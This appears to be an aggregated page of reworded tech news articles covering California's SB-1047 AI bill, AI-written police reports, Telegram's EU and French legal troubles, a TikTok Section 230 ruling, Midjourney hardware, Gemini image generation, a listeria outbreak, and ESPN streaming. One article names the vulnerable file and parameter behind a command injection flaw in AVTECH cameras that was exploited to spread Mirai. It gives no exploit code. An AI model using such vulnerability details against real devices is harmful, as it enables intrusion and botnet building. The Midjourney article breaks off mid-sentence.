Tag: Source: Arstechnica.com

Critics Call on Governor to Reject Disputed California AI Safety Legislation After It Secures Legislative Endorsement

## California’s AI Safety Bill: A Crucial Turning Point for AI Oversight

### Introduction

California stands poised to enact a transformative law that may establish a benchmark for artificial intelligence (AI) oversight throughout the United States. Senate Bill 1047 (SB-1047), which has gained substantial backing in both the California State Assembly and Senate, is now pending Governor Gavin Newsom’s approval. Sponsored by State Senator Scott Wiener, this legislation seeks to impose rigorous safety standards for large AI models that could introduce new risks to public safety and security. Nevertheless, the bill has ignited a fervent debate, with advocates and opponents presenting fundamentally opposing perspectives on its possible effects.

### The Essence of SB-1047

At its core, SB-1047 requires that developers of large AI models—those with training costs exceeding $100 million—install a “kill switch.” This feature would facilitate the swift deactivation of an AI system should it start to display behaviors that threaten public safety, particularly when functioning with limited human supervision. By concentrating on larger models, the bill aims to prevent hindering smaller startups, which may lack the capacity to meet such stringent regulations.

Supporters of the bill contend that it is a vital stride toward the responsible advancement of AI technologies. They highlight the swift growth in AI capabilities and the risk of these systems behaving in unpredictable and potentially perilous manners. Geoffrey Hinton and Yoshua Bengio, two prominent figures in the AI domain, have expressed their endorsement of the bill, stressing the importance of external oversight to safeguard public welfare.

### The Dispute: Safety Versus Innovation

Regardless of its good intentions, SB-1047 has encountered notable opposition from various stakeholders. One prominent critic is Fei-Fei Li, a Stanford University computer science professor and distinguished AI authority. In a recent opinion piece, Li asserted that, although the bill is well-intentioned, it risks causing unintended consequences that could hinder innovation not only in California but nationwide. She voiced apprehensions that the bill’s assignment of liability to original developers of altered AI models might deter open-source collaboration, which is essential for academic inquiry and the wider AI community.

Li’s worries are reflected by a coalition of California business executives who have petitioned Governor Newsom to reject the bill. In an open letter, they contended that SB-1047 misappropriately zeroes in on regulating model development as opposed to addressing the misuse of AI technologies. They cautioned that the bill could impose hefty compliance costs and create regulatory confusion, potentially discouraging investment and innovation within the state.

### Governor Newsom’s Predicament

Governor Gavin Newsom now confronts a challenging choice. On one hand, the considerable legislative backing for SB-1047 indicates strong political momentum to pass the bill. Should Newsom opt for a veto, the legislature might be able to override his decision with a two-thirds majority in both chambers—a plausible scenario given the current support for the measure.

Conversely, Newsom has raised concerns regarding excessive regulation of the AI sector. During a UC Berkeley Symposium in May, he pointed out the dangers of overregulation, which could place California in a “dangerous position.” Nonetheless, he also recognized the extraordinary circumstances surrounding AI, where even the technology’s creators are advocating for regulation. “When you have the inventors of this technology, the godmothers and fathers, saying, ‘Help, you need to regulate us,’ that’s a very different environment,” Newsom remarked.

### The Broader Consequences

The result of SB-1047 could have extensive ramifications, not just for California but for the entire AI landscape in the United States and beyond. If the bill is enacted, it might serve as an example for other states and potentially even inform federal regulations. It would also indicate a transition towards more proactive management of AI technologies, concentrating on preemptive actions rather than reactive responses.

Conversely, if the bill is vetoed, it could postpone the establishment of AI safety regulations and leave room for ongoing discussions on how best to balance innovation with public safety. This decision will also likely affect how other states address AI oversight, either motivating them to emulate California’s approach or to take a more cautious stance.

### Conclusion

As the deadline for Governor Newsom’s decision nears, all eyes are focused on California. SB-1047 marks a pivotal moment in the continued discourse surrounding AI regulation, with substantial consequences for the future of AI development. Whether the bill is enacted or vetoed, the dialogue it has ignited will undoubtedly persist, influencing the path of AI governance in the years that lie ahead.

Read More
Expert Cautions Chatbots May Allow Police to Alter Reports

### The Surge of AI in Law Enforcement: A Double-Edged Blade?

In recent times, the incorporation of artificial intelligence (AI) into diverse fields has been both praised and analyzed. Law enforcement is no different. The emergence of AI-driven tools like Axon’s Draft One, which produces police reports from body camera recordings, has ignited an intense discourse regarding the future of policing and the judicial system. While the technology claims to enhance time efficiency and operational productivity, it simultaneously provokes substantial issues surrounding accuracy, bias, and the risk of misuse.

#### The Potential of AI in Law Enforcement

Draft One, created by Axon—a firm recognized for its tasers and body cameras—marks a notable advancement in policing technology. This tool, powered by OpenAI’s GPT-4 model, can craft comprehensive police reports within minutes following an incident, relying solely on audio captured from body cameras. This feature is particularly enticing to police agencies, where officers typically invest hours in report writing—a duty many perceive as onerous.

In June 2024, the police department in Frederick, Colorado, became the inaugural department globally to adopt Draft One. The department noted that the tool significantly minimized the time officers devoted to paperwork, enabling them to concentrate more on their core responsibilities. Other departments throughout the United States swiftly adopted similar measures, eager to enjoy the advantages of this groundbreaking technology.

Axon has positioned Draft One as a transformative instrument that can “accelerate justice” by negating the necessity for manual data entry. The firm asserts that the AI-generated reports are as precise, if not more so, than those composed by humans. In a double-blind evaluation, Axon discovered that Draft One’s reports were equivalent to or superior to those created by humans concerning completeness, neutrality, objectivity, terminology, and coherence.

#### The Dangers and Issues

Notwithstanding the evident advantages, the rollout of AI-generated police reports has triggered concerns among legal professionals, civil rights proponents, and digital rights organizations. The primary apprehension involves the capacity for AI to incorporate errors, biases, or even intentional inaccuracies into police reports—documents that are essential to the justice framework.

One of the major dangers is the chance of AI “hallucinations,” where the system fabricates information that is inaccurate or unrelated to the incident. While Axon has asserted that it has mitigated such errors by “dialing down the creativity” of Draft One, the risk lingers. AI systems, including those based on GPT-4, are recognized for occasionally producing erroneous or misleading data, particularly when navigating intricate or nuanced contexts.

Furthermore, reliance on AI-generated reports could exacerbate pre-existing biases in policing. Body camera footage, which documents events from the officer’s viewpoint, already possesses the potential to skew the narrative in favor of law enforcement. If AI systems are trained on biased datasets or are affected by how officers articulate their observations, they could reinforce these biases, culminating in unjust results.

Legal scholars such as Andrew Ferguson have cautioned that AI-generated reports could “digitally contaminate” the evidence-based evolution of criminal proceedings. The apprehension is that AI might subtly modify the narrative in manners that skew police perspectives or mislead judicial entities. This could have expansive implications, especially in instances where the police report constitutes the principal piece of evidence.

#### The Risk of Misapplication

Another issue is the potential for the misuse of AI-generated reports. As the technology gains traction, there exists a risk that officers may employ it to manipulate the portrayal of an incident. For instance, an officer could consciously phrase their comments to sway the AI’s interpretation, leading to a report that favors the officer’s rendition of events, even if it lacks total accuracy.

This concern is heightened by the reality that AI-generated reports might be utilized in more serious scenarios, despite initial advisories to restrict their application to minor occurrences. In some jurisdictions, officers have already begun applying Draft One to a wider array of cases, raising alarms regarding the accuracy and dependability of the reports in more intricate situations.

Civil rights advocates are apprehensive that the extensive integration of AI-generated reports could lead to heightened police scrutiny, particularly in marginalized populations. If the technology simplifies the reporting process for officers, they may become more prone to pursue charges in circumstances where they might have earlier decided to dismiss the matter.

#### The Call for Transparency and Oversight

In light of the potential dangers, experts are advocating for enhanced transparency and oversight concerning the usage of AI-generated police reports. Ferguson has suggested that any implementation of this technology in legal contexts should be accompanied by thorough documentation regarding how AI models were developed, what data they utilized, and how the models were assessed. Such transparency is vital for ensuring that the reports are both accurate and trustworthy.

Additionally, there is an essential need for independent evaluation and auditing of AI-generated reports. Civil rights organizations like the Electronic Frontier Foundation (EFF) have urged police agencies to grant access to these reports for further examination. This would enable impartial experts to evaluate the precision and equitability of the AI-generated reports.

Read More
EU Probes If Telegram Downplayed User Figures to Avoid Regulation

### Telegram under EU Examination: An In-Depth Analysis of the Ongoing Probe

Telegram, the well-known messaging platform renowned for its encrypted communication features, is presently undergoing scrutiny by the European Union (EU) for potential violations of the Digital Services Act (DSA). The investigation focuses on whether Telegram has accurately reported its user figures within the EU, a vital aspect that influences the level of regulatory scrutiny the platform must meet.

#### The Heart of the Inquiry

The EU’s apprehensions arise from doubts that Telegram might have downplayed its user count in the area to avoid surpassing the 45 million user benchmark. Platforms that exceed this threshold are categorized as “very large online platforms” (VLOPs) under the DSA, which subjects them to stricter regulations. These regulations encompass improved content moderation, independent audits, and necessary data sharing with the European Commission.

As of February 2024, Telegram claimed to have 41 million users in the EU. However, it did not furnish an updated count as mandated by the DSA, instead indicating that it had “significantly fewer than 45 million average monthly active users in the EU.” This lack of clarity has led the EU to commence a technical investigation to ascertain the true number of Telegram users in the area.

#### Consequences of Being Designated a VLOP

Should Telegram be found to exceed 45 million users in the EU, it would be categorized as a VLOP, resulting in a range of additional responsibilities. These responsibilities include:

– **Content Moderation:** Telegram would be required to establish more effective systems for monitoring and removing illicit content, including misinformation and propaganda.
– **Data Sharing:** The platform would need to share more information with the European Commission, ensuring adherence to EU regulations.
– **Independent Audits:** Routine assessments by external organizations would become obligatory to confirm that Telegram complies with the DSA’s stipulations.
– **Advertising Restrictions:** The platform would be barred from targeting advertisements based on sensitive user information such as religion, gender, or sexual orientation.

These measures form part of the EU’s wider initiative to limit the dominance of large online platforms and ensure they function in a way that safeguards user rights and public safety.

#### Telegram’s Global Popularity and Challenges

In recent years, Telegram has experienced a significant rise in popularity, boasting a global user base approaching 1 billion. The app is especially favored for its encrypted messaging capabilities, offering enhanced privacy compared to other services. Nevertheless, this same aspect has rendered Telegram a hotspot for illegal activities, prompting investigations in various countries, including France.

Concurrently, French authorities are investigating Telegram for supposed criminal activities facilitated through the platform. This situation has resulted in the arrest of its founder, Pavel Durov, a billionaire originally from Russia who has since obtained French-Emirati citizenship. Durov, who left Russia in 2014 after refusing to comply with Moscow’s demands for access to Ukrainian user data, has denied any illicit behavior, asserting that he has “nothing to hide.”

#### The EU’s Future Actions

The EU’s Joint Research Centre, its internal data and science body, is currently conducting a technical probe to ascertain the validity of Telegram’s user statistics. Thomas Regnier, a spokesperson for digital affairs at the European Commission, stated that the EU possesses its own systems and analyses to confirm user data. If Telegram is found to have provided misleading information, the EU could independently classify it as a VLOP based on its findings.

The DSA regulations for VLOPs came into effect a year ago, affecting some of the world’s most significant online platforms, including Instagram, Google, and TikTok. These enterprises have needed to significantly enhance their compliance initiatives, employing thousands to meet the DSA’s rigorous demands. Some platforms have even pursued legal action against the EU, contending that the regulations are excessively demanding.

#### Final Thoughts

The ongoing inquiry into Telegram’s adherence to the DSA marks an important milestone in the EU’s strategy to regulate large online platforms. If it is determined that Telegram has more than 45 million users in the EU, it will encounter a range of new responsibilities aimed at promoting greater transparency, accountability, and user protection. As the investigation progresses, it will be essential to observe how Telegram reacts and whether it can fulfill the EU’s rigorous regulatory standards.

This situation also underscores the broader challenges facing global tech firms as they navigate increasingly intricate regulatory environments. With the EU at the forefront of digital regulation, other regions may follow suit soon, making compliance a paramount concern for platforms such as Telegram operating on a worldwide scale.

Read More
Critical 0-Day Flaw in Surveillance Cameras Leveraged to Introduce Mirai Malware

### Major Flaw in AVTECH Security Cameras Used to Distribute Mirai Malware

In a troubling turn of events for online security, cybercriminals have been taking advantage of a serious flaw in a popular security camera model, the AVM1203 from the Taiwan-based firm AVTECH, to distribute the infamous Mirai malware. This malware is notorious for transforming compromised Internet of Things (IoT) devices into botnets capable of executing large-scale distributed denial-of-service (DDoS) attacks. The flaw, designated CVE-2024-7029, has been actively exploited since March, according to network security firm Akamai.

#### The Flaw: A Five-Year-Old Vulnerability

The AVM1203 surveillance camera, which is no longer available for purchase or supported by AVTECH, possesses a zero-day vulnerability that has been acknowledged at least since 2019. This issue is found in the “brightness argument in the ‘action='” parameter within the camera’s firmware, particularly in the file `/cgi-bin/supervisor/Factory.cgi`. The vulnerability facilitates command injection, allowing attackers to run malicious code remotely on the compromised devices.

Even though the flaw has been publicly recognized for several years, it wasn’t formally designated until recently with the CVE-2024-7029 identifier. The lack of ongoing support for the camera means that no security updates are provided, forcing users to consider replacing the device to lessen the threat.

#### The Mirai Botnet: An Ongoing Danger

Mirai malware first gained notoriety in September 2016 when a botnet consisting of compromised IoT devices executed a massive DDoS attack that incapacitated the cybersecurity news site Krebs on Security. The botnet, made up of infected webcams, routers, and other IoT devices, could launch DDoS attacks of unprecedented magnitude. In the weeks that followed, Mirai was utilized to assault Internet service providers and other prominent organizations, such as a significant attack on dynamic domain name provider Dyn, leading to widespread disruptions of online services.

The scenario escalated when the creators of Mirai made its source code publicly available, enabling nearly anyone to develop their own botnets using the malware. This decision resulted in a surge of Mirai variants, each able to carry out destructive DDoS attacks.

#### Recent Exploits and Insights

Akamai’s Security Intelligence and Response Team (SIRT) has been actively tracking the recent exploitation of the AVM1203 flaw. By employing a “honeypot”—a network of devices designed to replicate the vulnerable cameras—Akamai has been able to witness the attacks live. However, the honeypot configuration does not provide a precise estimate of the botnet’s scale.

The attackers have exploited the vulnerability to deploy a version of the Mirai malware, specifically the Corona Mirai variant, which has been associated with other attacks since 2020. The malware propagates by connecting to numerous hosts via Telnet on ports 23, 2323, and 37215. Once executed, the malware displays the string “Corona” on the console of an infected device, indicating this specific variant.

#### Wider Implications and Recommendations

The exploitation of this flaw underscores the ongoing dangers posed by unsupported and unpatched IoT devices. The AVM1203 camera exemplifies how outdated technology can serve as a conduit for widespread cyberattacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also released alerts regarding this vulnerability, urging heightened awareness in securing IoT devices.

For individuals still using the AVM1203 or similar unsupported gadgets, the most advisable step is to replace them with more secure, modern alternatives. Furthermore, it is crucial to ensure that all IoT devices are not accessible with default credentials, as this represents a frequent entry point for attackers.

#### Conclusion

The exploitation of the AVM1203 vulnerability to disseminate Mirai malware highlights the critical need for keeping security measures current for all Internet-connected devices. As IoT devices become increasingly woven into our everyday lives, the urgency for strong cybersecurity practices continues to rise. Users must stay alert, ensuring that their devices are secure and supported, to avoid becoming unintentional participants in the next significant cyberattack.

Read More
Telegram’s CEO Confronts Several Criminal Allegations and Travel Restrictions in France

**Telegram CEO Pavel Durov Indicted in France: An In-Depth Look at the Allegations and Consequences**

Pavel Durov, the intriguing CEO and co-founder of Telegram, is now embroiled in a legal controversy in France. The tech mogul, renowned for his passionate defense of privacy and freedom of expression, has been indicted on numerous serious allegations, including complicity in unlawful transactions, refusal to assist law enforcement, and breaches of cryptology regulations. This piece explores the intricacies of the accusations, the wider ramifications for Telegram, and what this implies for the future of encrypted communication platforms.

### The Allegations: An Analysis

#### 1. **Complicity in Unlawful Transactions**

A key accusation against Durov involves complicity in “web-mastering an online platform to facilitate an illegal transaction within an organized group.” This allegation, which could result in a maximum sentence of 10 years in prison and a fine of 500,000 euros, arises from claims that Telegram has been utilized to enable unlawful activities, such as drug trafficking and the dissemination of child pornography.

Paris prosecutor Laure Beccuau stated that Telegram’s purported unwillingness to work with law enforcement has intensified these issues. The platform’s near-total lack of engagement with requests for support in criminal inquiries—especially those related to child exploitation, drug offenses, and online hate—has culminated in the present legal action.

#### 2. **Refusal to Assist Law Enforcement**

Another critical accusation concerns Telegram’s unwillingness to provide information or documents needed for lawful monitoring. French officials have long expressed dissatisfaction with Telegram’s hesitance to aid in criminal investigations, particularly in serious cases. This charge underscores the ongoing friction between tech firms emphasizing user privacy and governments aiming to uphold legal standards.

#### 3. **Cryptology-Related Breaches**

Durov is also facing several charges tied to offering cryptology services without notifying French authorities as required. French legislation mandates that providers of cryptology services must inform the National Cybersecurity Agency of France (ANSSI) about their activities. Such declarations are vital for enabling governmental oversight and regulation of cryptographic tools that ensure confidentiality.

The specific allegations include:
– Providing cryptology services without a certified declaration.
– Offering a cryptology tool that guarantees confidentiality without prior declaration.
– Importing a cryptology tool that assures authentication or integrity verification without prior declaration.

These allegations emphasize the intricate legal framework surrounding encryption and the complications that arise as tech companies operate in diverse regulatory landscapes.

### The Wider Implications for Telegram

Telegram, known for its blend of private messaging and social networking features, has traditionally been a favored platform among users who prioritize privacy. Although its messages are not end-to-end encrypted by default, users can activate this feature for individual chats. This versatility has attracted a broad range of users, from privacy advocates to individuals engaged in questionable activities.

The charges against Durov prompt crucial inquiries regarding the accountability of platform owners for their users’ actions. In a statement responding to the indictment, Telegram claimed it complies with legal and industry standards for moderation. The company described it as “absurd to assert that a platform or its owner is liable for abuses occurring on that platform.”

Nevertheless, the legal proceedings in France imply that officials are increasingly disinclined to accept this defense. As governments globally tackle the challenges presented by encrypted communication platforms, the resolution of Durov’s case could establish a significant legal precedent.

### The Future of Encrypted Communication

The accusations against Pavel Durov and the heightened scrutiny of Telegram reveal the escalating conflict between privacy and security in today’s digital landscape. As more individuals gravitate towards encrypted communication platforms to safeguard their privacy, governments struggle to reconcile the imperative for security with individuals’ rights to communicate freely and privately.

The outcome of this case may hold profound implications for the future of encrypted communication. If Durov is convicted, it could encourage other governments to pursue similar actions against tech firms that resist cooperating with law enforcement. Conversely, a dismissal of the charges could bolster the position of privacy advocates who contend that individuals possess the right to communicate free from government oversight.

### Conclusion

Pavel Durov’s indictment in France signifies a critical juncture in the ongoing dialogue surrounding privacy, security, and the involvement of tech companies in contemporary society. As the case develops, it will be closely monitored by privacy advocates, law enforcement bodies, and tech firms alike. The result could influence the future landscape of encrypted communication and establish essential legal precedents regarding governmental regulation of digital platforms.

For now, Durov remains in France, prohibited from leaving and required to report to authorities twice weekly. As the legal proceedings advance, the world will observe how this high-stakes conflict between privacy and security evolves.

Read More
Court Decides Section 230 Offers No Protection to TikTok in Lawsuit Regarding Death from Blackout Challenge

### Appeals Court Revives Lawsuit Against TikTok Over Child’s Death in “Blackout Challenge”

In a noteworthy legal turn, an appeals court has reinstated a lawsuit against TikTok, overturning a previous ruling from a lower court that had conferred immunity upon the social media giant under Section 230 of the Communications Decency Act. This case revolves around the heartbreaking death of a child who engaged in the perilous “Blackout Challenge,” a viral phenomenon that prompted users to choke themselves until they lost consciousness.

#### Background: The “Blackout Challenge” and Section 230

The “Blackout Challenge” represents a troubling trend that has emerged on various social media platforms, TikTok included. This challenge requires users to choke themselves with objects like belts or cords until they become unconscious. Tragically, multiple children have died while attempting this challenge, triggering numerous lawsuits against TikTok.

In 2022, Tawainna Anderson, mother of Nylah Anderson—one of the victims—filed a lawsuit against TikTok. The complaint claimed that TikTok’s algorithm pushed the hazardous challenge toward Nylah, contributing to her demise. Nevertheless, the lower court rejected the case, referencing Section 230, which typically protects online platforms from liability regarding third-party content.

#### The Appeals Court’s Ruling

In a recent decision, Third Circuit Judge Patty Shwartz overturned the previous ruling, asserting that Section 230 does not offer absolute immunity to TikTok in this instance. Judge Shwartz noted that TikTok’s algorithm does more than merely host third-party content; it actively curates and endorses certain videos for users, rendering it an “expressive product” of the platform itself.

Shwartz referenced a recent Supreme Court decision that highlighted the difference between third-party speech and a platform’s own “expressive activity.” According to this ruling, if a platform’s algorithm embodies editorial choices regarding the content it supports, that action could be classified as the platform’s own speech, which Section 230 does not shield.

The appeals court has since remanded the matter back to the district court, which will address Anderson’s outstanding claims. The district court will also have to ascertain which claims are precluded by Section 230, in line with the Third Circuit’s judgment.

#### Implications for TikTok and Other Social Media Platforms

This ruling may have significant repercussions for TikTok and various other social media platforms that depend on algorithms to curate and highlight content. Should the courts ultimately deem TikTok accountable for endorsing harmful content through its algorithm, it could pave the way for an increase in lawsuits against social media companies, especially concerning child safety.

Circuit Judge Paul Matey, who partially agreed with the ruling, stressed that Section 230 should not be interpreted so expansively as to enable companies like TikTok to disregard the hazards associated with the content they promote. Matey advocated for a “far narrower” interpretation of Section 230, one that would hold platforms responsible for knowingly disseminating harmful content.

Matey also remarked that by the time Nylah Anderson engaged in the “Blackout Challenge,” TikTok had already recognized the risks linked to the trend but failed to take sufficient measures to curb its proliferation. He contended that TikTok should be liable for its targeted promotion of harmful content, especially when it pertains to the safety of children.

#### The Ongoing Legal Battle

Anderson’s legal team has pledged to persist in seeking justice, contending that the Communications Decency Act was never meant to permit social media companies to gain from endorsing dangerous content aimed at children. They have expressed optimism that the revived lawsuit will result in enhanced protections for minors on social media platforms.

TikTok, for its part, has earlier declared its commitment to user safety and has promised to “remain vigilant” in eliminating harmful content, including the “Blackout Challenge.” Nevertheless, the company has yet to respond to the latest ruling.

As the case progresses, it will attract considerable attention from legal professionals, social media enterprises, and concerned parents. The outcome could establish a precedent for how courts understand Section 230 in relation to algorithm-driven content promotion, potentially altering the legal framework for online platforms.

Read More
Midjourney AI Firm Teases New Hardware Release Featuring Unique Form Factor

### Midjourney’s Enigmatic Hardware Initiative: A Preview of the AI Device Future

Midjourney, celebrated for its state-of-the-art AI image-creation tool, has recently generated buzz in the tech arena with an unforeseen announcement: it is embarking on a hardware journey. Initially recognized for its software expertise, the firm is now assembling a team to investigate the potential of AI-integrated devices. This development has stirred intrigue and speculation, particularly in light of the ambiguous clues and witty hints from Midjourney’s founder, David Holz.

#### Transitioning from Software to Hardware

This revelation was shared through Midjourney’s official X (formerly Twitter) handle, where the company urged applicants to seek positions within its newly established hardware division. This signifies a prominent change for Midjourney, previously synonymous with its AI image-generation prowess. The choice to expand into hardware is captivating, especially considering Holz’s history.

David Holz is well-acquainted with the hardware domain. Prior to establishing Midjourney, he served as the CTO at Leap Motion, a firm recognized for its pioneering hand-tracking innovation. His credentials in hardware are further enhanced by the recent addition of Ahmad Abbas, who held a hardware management role at Apple for the Vision Pro headset. Abbas now occupies the position of “Head of Hardware” at Midjourney, reinforcing the company’s commitment to its new direction.

#### The Orb: A Playful Suggestion or a Serious Concept?

While the particulars of Midjourney’s hardware are still under wraps, the company has been sharing hints that have ignited speculation. One captivating clue emerged from a tweet by Holz, who humorously responded to a meme portraying a wizard with an orb from the I.C.E. book *Middle-earth: Valar and Maiar*. Holz remarked that the new hardware form factor “might be an orb,” a statement that has since attracted considerable interest.

The notion of an orb as a hardware device is not entirely implausible, especially regarding AI. In fantasy narratives, orbs such as the palantírs in *The Lord of the Rings* are mystical entities that enable users to observe remote occurrences or communicate over long distances. Adapting this idea to reality, an AI-powered orb could feasibly function as a cutting-edge communication or visualization tool, utilizing advanced AI to offer users distinctive interactive experiences.

Nonetheless, it’s essential to recognize that both Midjourney and Holz have a tendency for playful and enigmatic engagement on social platforms. While the orb idea is intriguing, it may well be more of a fanciful concept than a definitive product strategy. Yet, the prospect of an orb-like gadget has captured many imaginations and isn’t entirely beyond reach, given Midjourney’s inventive approach to technology.

#### What Might Midjourney’s Hardware Entail?

Aside from the orb conjecture, Midjourney has been reticent about its hardware aspirations. The company has suggested that it has “multiple efforts in flight” and that there are “definitely opportunities for more form factors.” This indicates that Midjourney is investigating various options, possibly encompassing wearable devices, smart home technologies, or even entirely new genres of AI-driven hardware.

One thing is unequivocal: Midjourney aims to stand out from the pack. The company has clearly stated that its device “is not gonna be a pendant,” distancing itself from the current trend of pendant-like AI gadgets that have struggled to resonate. Instead, Midjourney appears to be striving for something more innovative and distinct, although what that may be remains to be discovered.

#### The Larger Perspective: AI-Driven Hardware

Midjourney’s dive into hardware forms part of a wider trend in the tech sector, where firms are increasingly investigating the convergence of AI with tangible devices. As AI continues to evolve, the potential for crafting intelligent, responsive hardware that can engage with users in novel and meaningful ways becomes increasingly evident.

Midjourney’s venture into this domain is especially compelling given its foundation in AI-powered creativity. The company’s image-generation tool has already showcased the capacity of AI to enhance human creativity, and it’s conceivable that its hardware could expand on this base, providing users with innovative methods to interact with AI in their everyday lives.

#### Conclusion: A Fresh Chapter for Midjourney

Although specifics about Midjourney’s hardware ambitions remain limited, the company’s declaration has undoubtedly captured the attention of the tech community. With David Holz’s expertise in hardware and a team that includes former Apple talent, Midjourney is primed to make a substantial mark in the AI-driven hardware landscape.

Whether the end product takes the form of an orb, a wearable, or something entirely unforeseen, one certainty remains: Midjourney is redefining the boundaries of AI’s capabilities, both in software and now in hardware. As the company

Read More
Google AI Restarts Human Image Creation After Worries About Historical Precision

### Google’s Gemini AI Model Revives Human Image Creation with Enhanced Protections

Google’s Gemini AI model, particularly the Imagen 3 framework, has reinstated its capability to produce human images after a brief hiatus earlier this year. This suspension, initiated in February, resulted from considerable backlash regarding the generation of historically inaccurate and racially insensitive visuals. The revised Imagen 3 is now accessible to Gemini Advanced, Business, and Enterprise users, with a public variant obtainable through the Gemini Labs testing platform.

#### Background: The Suspension and the Dispute

The initial halt in human image generation within Google’s AI frameworks was prompted by extensive criticism. Users and specialists noted that the AI frequently created racially diverse representations in scenarios where historical accuracy was warranted. For instance, when tasked with generating images of historical figures such as British monarchs or 15th-century explorers, the AI occasionally depicted individuals of various ethnic backgrounds, inviting accusations of historical distortion.

This dispute underscored the difficulties of reconciling inclusivity with factual accuracy in AI-generated materials. Consequently, Google opted to pause this feature and reassess its methodology to prevent the AI from propagating misleading or offensive imagery.

#### The Comeback of Human Image Generation

In August 2024, Google revealed the revival of human image generation within its Imagen 3 model. This re-launch includes a series of new safeguards aimed at curbing the production of contentious or unsuitable images. Per an announcement in Google’s blog, the updated model refrains from generating “photorealistic, identifiable individuals, representations of minors, or excessively gory, violent, or explicit scenes.”

Additionally, the AI imposes limitations on generating visuals of notable figures. For example, a request for “President Biden playing basketball” would be denied, while a broader prompt like “a US president playing basketball” would be permissible. This strategy seeks to avert the creation of images that could be misconstrued or misused in misleading ways.

#### Enhanced Accuracy and Historical Representation

Tests performed by Ars Technica demonstrated that the new Imagen 3 system has made considerable strides in sidestepping the issues that necessitated the earlier suspension. For instance, when prompted for a “historically accurate depiction of a British king,” the AI now yields images of bearded white men in red garments, more accurately reflecting historical data.

The updated model also shows greater caution in its outputs. Requests for images that might lead to contentious or historically delicate representations, such as “a 1943 German soldier” or “a women’s suffrage leader delivering a speech,” now result in error messages guiding users to consider alternative prompts.

#### Persistent Challenges and Future Enhancements

Despite these advancements, Google recognizes that the system is not flawless. The company has pledged to perpetually enhance the model based on user input. “Naturally, as with any generative AI tool, not every image created by Gemini will be flawless, but we will continue to heed feedback from early users while we strive for improvement,” Google mentioned in its blog.

The phased introduction of these new features aims to extend the updated AI functionalities to a wider audience while ensuring that the system remains ethical and responsible in its outputs.

#### Conclusion

Google’s reinstatement of human image generation within its Gemini AI model signifies a major advancement in the continuous evolution of generative AI technologies. By enforcing stricter protections and prioritizing historical accuracy, Google seeks to sidestep the controversies that affected previous iterations of the model. As the technology progresses, it will be essential for Google and other AI developers to uphold a balance between creative expression and ethical accountability.

Read More
Five More Fatalities Documented in Unprecedented Outbreak Associated with Boar’s Head Meats

### Listeria Outbreak Associated with Boar’s Head Meats: A Rising Public Health Issue

The Centers for Disease Control and Prevention (CDC) has announced a notable increase in a nationwide outbreak of *Listeria monocytogenes* infections, which has already resulted in the deaths of eight individuals. The outbreak, tied to infected Boar’s Head brand meats, has affected 57 people across 18 states, all of whom required hospitalization. This is the most serious listeriosis outbreak in the United States since 2011, when tainted cantaloupe resulted in 147 infections and 33 fatalities.

#### The Extent of the Outbreak

The outbreak has been linked to Boar’s Head meat products, prompting a substantial recall of over 7 million pounds of meat. The recall, initially announced on July 26 and expanded on July 30, included 71 varied products from the company. Despite these measures, the tally of cases and deaths continues to climb, with the latest update from the CDC reporting five additional fatalities since early August.

The CDC has stressed the necessity of avoiding recalled items, highlighting that *Listeria monocytogenes* is a particularly tough bacterium. It can endure on surfaces like meat slicers and in food even at refrigerator temperatures. The agency also cautioned that listeriosis symptoms may take as long as 10 weeks to manifest, emphasizing the importance for consumers to stay alert.

#### Comprehending Listeriosis

*Listeria monocytogenes* is a bacterium capable of causing a severe infection referred to as listeriosis. This infection poses particular risks for specific groups, including pregnant women, individuals aged 65 and above, and those with compromised immune systems. In these populations, the bacteria are more prone to spread beyond the gastrointestinal system, resulting in invasive listeriosis.

In elderly and immunocompromised individuals, listeriosis commonly presents with symptoms such as fever, muscle aches, and fatigue. However, it can also lead to more severe signs like headaches, stiff necks, confusion, loss of balance, and seizures. These situations nearly always necessitate hospitalization, and around 1 in 6 affected individuals succumb to the infection.

For pregnant women, listeriosis is particularly alarming. Although the symptoms may be akin—fever, muscle aches, and fatigue—the infection can also result in miscarriage, stillbirth, premature delivery, or a serious infection in newborns.

#### Recommended Actions

In light of the seriousness of this outbreak, the CDC has put forth several suggestions for consumers:

1. **Inspect Your Refrigerator:** If you possess any Boar’s Head products, examine the sell-by dates. The recalled items have sell-by dates extending into October. If you discover any recalled products, do not eat them.

2. **Dispose or Return:** If you find any recalled goods, either throw them away or return them to the store from which they were bought for a refund.

3. **Sanitize Your Fridge:** Given that *Listeria monocytogenes* can persist on surfaces and in cold settings, it is vital to thoroughly disinfect your refrigerator if it has contained any recalled products.

4. **Watch for Symptoms:** If you have consumed any of the recalled items, remain alert for listeriosis symptoms, especially if you fall within a high-risk category. Symptoms can emerge up to 10 weeks later, making continuous observation critical.

#### Wider Consequences

This outbreak serves as a powerful reminder regarding the significance of food safety and the potential hazards from foodborne pathogens. The durability of *Listeria monocytogenes* emphasizes the necessity for strict hygiene measures in food processing facilities and the vital role of prompt recalls in averting widespread illness.

For consumers, this situation amplifies the importance of staying informed about food recalls and acting swiftly when needed. While the CDC and the U.S. Department of Agriculture (USDA) strive to manage the outbreak and prevent additional cases, public awareness and compliance with safety guidelines are vital in reducing the effects of this perilous bacterium.

As the situation progresses, it is critical to remain updated on any new information and adhere to the guidance issued by health authorities. By implementing these precautions, we can aid in safeguarding ourselves and our communities from the serious threats posed by *Listeria monocytogenes*.

Read More
“ESPN’s ‘Where to Watch’ Seeks to Streamline Locating Sports Broadcasts”

# ESPN’s Innovative “Where to Watch” Feature: A Revolution for Sports Enthusiasts Navigating the Streaming Landscape

In the constantly changing realm of sports broadcasting, discovering where to catch your beloved games has turned into a more challenging task. With numerous streaming platforms, cable networks, and complex licensing agreements, sports enthusiasts frequently find themselves overwhelmed by a multitude of options. ESPN has recognized this challenge and is stepping forward with a new feature aimed at simplifying the experience: “Where to Watch.”

## The Challenge: A Division in Viewing Accessibility

Today’s sports enthusiasts are all too familiar with the annoyance of pinpointing where a particular game is being aired. Whether dealing with a local blackout, an event exclusive to a certain streaming platform, or a match shown on a less familiar cable network, the process of discovering the correct channel can be quite intimidating. This problem becomes even more pronounced for individuals who have severed their traditional cable ties and depend entirely on streaming services, which often offer limited access to regional sports broadcasts.

Consider, for example, living in proximity to Wrigley Field in Chicago yet being unable to view the majority of Cubs games because they’re solely broadcast on a cable channel outside your subscription. Or think about a former resident of Los Angeles who now supports the Dodgers from a distance, only to discover local blackout restrictions don’t apply, enabling easier access to games from different regions. Such situations are prevalent, underscoring the necessity for a more efficient method to discover and engage with sports broadcasts.

## The Answer: ESPN’s “Where to Watch”

